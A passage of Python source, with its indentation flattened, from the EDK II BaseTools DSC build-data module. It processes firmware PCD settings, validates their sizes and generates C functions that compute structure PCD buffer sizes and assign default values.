if str_pcd_obj.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
continue
PcdDefaultStoreSet = set(defaultstorename for skuobj in str_pcd_obj.SkuInfoList.values() for defaultstorename in skuobj.DefaultStoreDict)
DefaultStoreObj = DefaultStore(self._GetDefaultStores())
mindefaultstorename = DefaultStoreObj.GetMin(PcdDefaultStoreSet)
str_pcd_obj.SkuInfoList[self.SkuIdMgr.SystemSkuId].HiiDefaultValue = str_pcd_obj.SkuInfoList[self.SkuIdMgr.SystemSkuId].DefaultStoreDict[mindefaultstorename]
for str_pcd_obj in S_pcd_set.values():
str_pcd_obj.MaxDatumSize = DscBuildData.GetStructurePcdMaxSize(str_pcd_obj)
Pcds[str_pcd_obj.TokenCName, str_pcd_obj.TokenSpaceGuidCName] = str_pcd_obj
Pcds[str_pcd_obj.TokenCName, str_pcd_obj.TokenSpaceGuidCName].CustomAttribute['IsStru']=True
for pcdkey in Pcds:
pcd = Pcds[pcdkey]
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
list(map(self.FilterSkuSettings, [Pcds[pcdkey] for pcdkey in Pcds if Pcds[pcdkey].Type in DynamicPcdType]))
return Pcds
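## Set of PCD names used by the modules and libraries of this platform
#
#   Collects PcdsName from every module listed in the DSC and FDF files and
#   from every library instance, and returns the union as a set.
#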
@cached_property
def PlatformUsedPcds(self):
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
FdfModuleList = [PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch) for Inf in FdfInfList]
AllModulePcds = set()
ModuleSet = set(list(self._Modules.keys()) + FdfModuleList)
for ModuleFile in ModuleSet:
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
AllModulePcds = AllModulePcds | ModuleData.PcdsName
for ModuleFile in self.LibraryInstances:
ModuleData = self._Bdb.CreateBuildObject(ModuleFile, self._Arch, self._Target, self._Toolchain)
AllModulePcds = AllModulePcds | ModuleData.PcdsName
return AllModulePcds
# Filter out the Structure PCDs that are not used by any module in the DSC or FDF files.
def FilterStrcturePcd(self, S_pcd_set):
UnusedStruPcds = set(S_pcd_set.keys()) - self.PlatformUsedPcds
for (Token, TokenSpaceGuid) in UnusedStruPcds:
del S_pcd_set[(Token, TokenSpaceGuid)]
## Retrieve non-dynamic PCD settings
#
# @param Type PCD type
#
# @retval a dict object containing the settings of the given PCD type
#
def _GetPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special kind of dict, used to select the correct
# PCD settings for a given ARCH
#
AvailableSkuIdSet = copy.copy(self.SkuIds)
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
PcdValueDict = OrderedDict()
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build ', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if SkuName in (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT, TAB_COMMON):
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, PcdCName, TokenSpaceGuid, SkuName] = Setting
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, PcdCName, TokenSpaceGuid, SkuName]
if Setting is None:
continue
PcdValue, DatumType, MaxDatumSize = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if (PcdCName, TokenSpaceGuid) in PcdValueDict:
PcdValueDict[PcdCName, TokenSpaceGuid][SkuName] = (PcdValue, DatumType, MaxDatumSize,Dummy4)
else:
PcdValueDict[PcdCName, TokenSpaceGuid] = {SkuName:(PcdValue, DatumType, MaxDatumSize,Dummy4)}
for ((PcdCName, TokenSpaceGuid), PcdSetting) in PcdValueDict.items():
if self.SkuIdMgr.SystemSkuId in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[self.SkuIdMgr.SystemSkuId]
elif TAB_DEFAULT in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[TAB_DEFAULT]
elif TAB_COMMON in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[TAB_COMMON]
else:
PcdValue = None
DatumType = None
MaxDatumSize = None
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
DatumType,
PcdValue,
'',
MaxDatumSize,
{},
False,
None,
IsDsc=True)
for SkuName in PcdValueDict[PcdCName, TokenSpaceGuid]:
Settings = PcdValueDict[PcdCName, TokenSpaceGuid][SkuName]
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = Settings[0]
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Settings[3])
return Pcds
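## Calculate the maximum size of a structure PCD value
#
#   Inspect the default value and every SKU value of the PCD and return the
#   largest length as a string.
#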
@staticmethod
def GetStructurePcdMaxSize(str_pcd):
pcd_default_value = str_pcd.DefaultValue
sku_values = [skuobj.HiiDefaultValue if str_pcd.Type in [DscBuildData._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], DscBuildData._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]] else skuobj.DefaultValue for skuobj in str_pcd.SkuInfoList.values()]
sku_values.append(pcd_default_value)
def get_length(value):
Value = value.strip()
if len(value) > 1:
if Value.startswith(TAB_GUID) and Value.endswith(')'):
return 16
if Value.startswith('L"') and Value.endswith('"'):
return len(Value[2:-1])
if Value[0] == '"' and Value[-1] == '"':
return len(Value) - 2
if Value.strip().startswith("{CODE("):
tmpValue = RemoveCComments(Value)
return len(tmpValue.split(","))
if (Value[0] == '{' and Value[-1] == '}'):
return len(Value.split(","))
if Value.startswith("L'") and Value.endswith("'") and len(list(Value[2:-1])) > 1:
return len(list(Value[2:-1]))
if Value[0] == "'" and Value[-1] == "'" and len(list(Value[1:-1])) > 1:
return len(Value) - 2
return len(Value)
return str(max(get_length(item) for item in sku_values))
@staticmethod
def ExecuteCommand (Command):
try:
Process = subprocess.Popen(Command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except:
EdkLogger.error('Build', COMMAND_FAILURE, 'Can not execute command: %s' % Command)
Result = Process.communicate()
return Process.returncode, Result[0].decode(), Result[1].decode()
@staticmethod
def IntToCString(Value, ValueSize):
Result = '"'
if not isinstance (Value, str):
for Index in range(0, ValueSize):
Result = Result + '\\x%02x' % (Value & 0xff)
Value = Value >> 8
Result = Result + '"'
return Result
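## Generate the C function that calculates the buffer size of a structure PCD
#
#   Emits Cal_<Guid>_<Name>_Size(), which grows *Size according to the DEC
#   default, the DSC/FDF/command-line field overrides and the declared
#   maximum size of the PCD.
#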
def GenerateSizeFunction(self, Pcd):
CApp = "// Default Value in Dec \n"
CApp = CApp + "void Cal_%s_%s_Size(UINT32 *Size){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
CApp += " *Size = (sizeof (%s) > *Size ? sizeof (%s) : *Size);\n" % (Pcd.DatumType,Pcd.DatumType)
else:
if "{CODE(" in Pcd.DefaultValueFromDec:
CApp += " *Size = (sizeof (%s_%s_INIT_Value) > *Size ? sizeof (%s_%s_INIT_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Pcd.TokenSpaceGuidCName,Pcd.TokenCName)
if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
for skuname in Pcd.SkuInfoList:
skuobj = Pcd.SkuInfoList[skuname]
if skuobj.VariableName:
for defaultstore in skuobj.DefaultStoreDict:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,skuname,defaultstore)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
else:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,skuname,TAB_DEFAULT_STORES_DEFAULT)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
else:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
ActualCap = []
for index in Pcd.DefaultValues:
if index:
ActualCap.append(index)
FieldList = Pcd.DefaultValues[index]
if not FieldList:
continue
for FieldName in FieldList:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(FieldList[FieldName.strip(".")][0])
if IsArray and not (FieldList[FieldName.strip(".")][0].startswith('{GUID') and FieldList[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(FieldList[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2], FieldList[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, FieldList[FieldName_ori][1], FieldList[FieldName_ori][2], FieldList[FieldName_ori][0])
for skuname in Pcd.SkuOverrideValues:
if skuname == TAB_COMMON:
continue
for defaultstorenameitem in Pcd.SkuOverrideValues[skuname]:
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (skuname, defaultstorenameitem)
for index in Pcd.SkuOverrideValues[skuname][defaultstorenameitem]:
if index:
ActualCap.append(index)
for FieldList in [Pcd.SkuOverrideValues[skuname][defaultstorenameitem][index]]:
if not FieldList:
continue
for FieldName in FieldList:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(FieldList[FieldName.strip(".")][0])
if IsArray and not (FieldList[FieldName.strip(".")][0].startswith('{GUID') and FieldList[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(FieldList[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2], FieldList[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, FieldList[FieldName_ori][1], FieldList[FieldName_ori][2], FieldList[FieldName_ori][0])
if Pcd.PcdFieldValueFromFdf:
CApp = CApp + "// From fdf \n"
for FieldName in Pcd.PcdFieldValueFromFdf:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0])
if IsArray and not (Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0].startswith('{GUID') and Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][1], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][1], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][2], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName:
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %s Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, Pcd.PcdFieldValueFromFdf[FieldName_ori][1], Pcd.PcdFieldValueFromFdf[FieldName_ori][2], Pcd.PcdFieldValueFromFdf[FieldName_ori][0])
if Pcd.PcdFieldValueFromComm:
CApp = CApp + "// From Command Line \n"
for FieldName in Pcd.PcdFieldValueFromComm:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0])
if IsArray and not (Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0].startswith('{GUID') and Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), Pcd.PcdFieldValueFromComm[FieldName.strip(".")][1], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), Pcd.PcdFieldValueFromComm[FieldName.strip(".")][1], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][2], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, Pcd.PcdFieldValueFromComm[FieldName_ori][1], Pcd.PcdFieldValueFromComm[FieldName_ori][2], Pcd.PcdFieldValueFromComm[FieldName_ori][0])
if Pcd.GetPcdMaxSize():
CApp = CApp + " *Size = (%d > *Size ? %d : *Size); // The Pcd maxsize is %d \n" % (Pcd.GetPcdMaxSize(), Pcd.GetPcdMaxSize(), Pcd.GetPcdMaxSize())
ArraySizeByAssign = self.CalculateActualCap(ActualCap)
if ArraySizeByAssign > 1:
CApp = CApp + " *Size = (%d > *Size ? %d : *Size); \n" % (ArraySizeByAssign, ArraySizeByAssign)
CApp = CApp + "}\n"
return CApp
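## Calculate the array capacity implied by indexed PCD assignments
#
#   @retval the largest number of elements referenced by the collected index
#           expressions, or 1 if it cannot be determined
#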
def CalculateActualCap(self,ActualCap):
if not ActualCap:
return 1
maxsize = 1
for item in ActualCap:
index_elements = ArrayIndex.findall(item)
rt = 1
for index_e in index_elements:
index_num = index_e.lstrip("[").rstrip("]").strip()
if not index_num:
# Flexible PCD array assignment is not supported
return 1
index_num = int(index_num,16) if index_num.startswith(("0x","0X")) else int(index_num)
rt = rt * (index_num+1)
if rt >maxsize:
maxsize = rt
return maxsize
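## Generate the C statements that initialize the Size variable for a PCD
#
#   Emits the "Size = sizeof(...)" assignment and the call to the
#   Cal_<Guid>_<Name>_Size() helper produced by GenerateSizeFunction.
#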
@staticmethod
def GenerateSizeStatments(Pcd,skuname,defaultstorename):
if Pcd.IsArray():
r_datatype = [Pcd.BaseDatumType]
lastoneisEmpty = False
for dem in Pcd.Capacity:
if lastoneisEmpty:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName))))
if dem == '0' or dem == "-1":
r_datatype.append("[1]")
lastoneisEmpty = True
else:
r_datatype.append("[" + dem + "]")
if Pcd.Type in [MODEL_PCD_DYNAMIC_EX_HII, MODEL_PCD_DYNAMIC_HII]:
PcdDefValue = Pcd.SkuInfoList.get(skuname).DefaultStoreDict.get(defaultstorename)
elif Pcd.Type in [MODEL_PCD_DYNAMIC_EX_DEFAULT,MODEL_PCD_DYNAMIC_VPD,MODEL_PCD_DYNAMIC_DEFAULT,MODEL_PCD_DYNAMIC_EX_VPD]:
PcdDefValue = Pcd.SkuInfoList.get(skuname).DefaultValue
else:
PcdDefValue = Pcd.DefaultValue
if lastoneisEmpty:
if "{CODE(" not in PcdDefValue:
sizebasevalue_plus = "(%s / sizeof(%s) + 1)" % ((DscBuildData.GetStructurePcdMaxSize(Pcd), Pcd.BaseDatumType))
sizebasevalue = "(%s / sizeof(%s))" % ((DscBuildData.GetStructurePcdMaxSize(Pcd), Pcd.BaseDatumType))
sizeof = "sizeof(%s)" % Pcd.BaseDatumType
CApp = ' int ArraySize = %s %% %s ? %s : %s ;\n' % ( (DscBuildData.GetStructurePcdMaxSize(Pcd), sizeof, sizebasevalue_plus, sizebasevalue))
CApp += ' Size = ArraySize * sizeof(%s); \n' % Pcd.BaseDatumType
else:
CApp = " Size = 0;\n"
else:
CApp = ' Size = sizeof(%s);\n' % ("".join(r_datatype) )
else:
CApp = ' Size = sizeof(%s);\n' % (Pcd.DatumType)
CApp = CApp + ' Cal_%s_%s_Size(&Size);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GetIndicator(self,index,FieldName,Pcd):
def cleanupindex(indexstr):
return indexstr.strip("[").strip("]").strip()
index_elements = ArrayIndex.findall(index)
pcd_capacity = Pcd.Capacity
if index:
indicator = "(Pcd"
if len(pcd_capacity)>2:
for i in range(0,len(index_elements)):
index_ele = index_elements[i]
index_num = index_ele.strip("[").strip("]").strip()
if i == len(index_elements) -2:
indicator += "+ %d*Size/sizeof(%s)/%d + %s)" %(int(cleanupindex(index_elements[i+1])),Pcd.BaseDatumType,reduce(lambda x,y: int(x)*int(y),pcd_capacity[:-1]), cleanupindex(index_elements[i]))
break
else:
indicator += " + %d*%s*Size/sizeof(%s)/%d" %(int(cleanupindex(index_elements[i])),reduce(lambda x,y: int(x)*int(y),pcd_capacity[i+1:-1]),Pcd.BaseDatumType,reduce(lambda x,y: int(x)*int(y),pcd_capacity[:-1]))
elif len(pcd_capacity) == 2:
indicator += "+ %d*Size/sizeof(%s)/%d + %s)" %(int(cleanupindex(index_elements[0])),Pcd.BaseDatumType,int(pcd_capacity[0]), index_elements[1].strip("[").strip("]").strip())
elif len(pcd_capacity) == 1:
index_ele = index_elements[0]
index_num = index_ele.strip("[").strip("]").strip()
indicator += " + %s)" % (index_num)
else:
indicator = "Pcd"
if FieldName:
indicator += "->" + FieldName
return indicator
def GetStarNum(self,Pcd):
if not Pcd.IsArray():
return 1
elif Pcd.IsSimpleTypeArray():
return len(Pcd.Capacity)
else:
return len(Pcd.Capacity) + 1
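## Generate the C function that assigns the DEC default value of a PCD
#
#   Emits Assign_<Guid>_<Name>_Default_Value(), which copies the DEC default
#   value and every DEC field default into the PCD buffer.
#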
def GenerateDefaultValueAssignFunction(self, Pcd):
CApp = "// Default value in Dec \n"
CApp = CApp + "void Assign_%s_%s_Default_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 PcdArraySize;\n'
DefaultValueFromDec = Pcd.DefaultValueFromDec
IsArray = _IsFieldValueAnArray(Pcd.DefaultValueFromDec)
if IsArray:
try:
DefaultValueFromDec = ValueExpressionEx(Pcd.DefaultValueFromDec, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from DEC: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, DefaultValueFromDec))
DefaultValueFromDec = StringToArray(DefaultValueFromDec)
Value, ValueSize = ParseFieldValue (DefaultValueFromDec)
if IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in Pcd.DefaultValueFromDec:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_INIT_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dec exceed the array capability %s"); // From %s Line %s \n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,Pcd.DefaultValueFromDecInfo[0],Pcd.DefaultValueFromDecInfo[1])
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_INIT_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' memcpy (Pcd, %s_%s_INIT_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dec exceed the array capability %s"); // From %s Line %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,Pcd.DefaultValueFromDecInfo[0],Pcd.DefaultValueFromDecInfo[1])
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DEC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultValueFromDec)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in Pcd.DefaultValueFromDec:
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_INIT_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_INIT_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
CApp = CApp + ' Value = %s; // From DEC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultValueFromDec)
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
elif isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From DEC Default Value %s\n' % (Value, Pcd.DefaultValueFromDec)
for index in Pcd.DefaultValues:
FieldList = Pcd.DefaultValues[index]
if not FieldList:
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
indicator = self.GetIndicator(index, FieldName,Pcd)
if IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
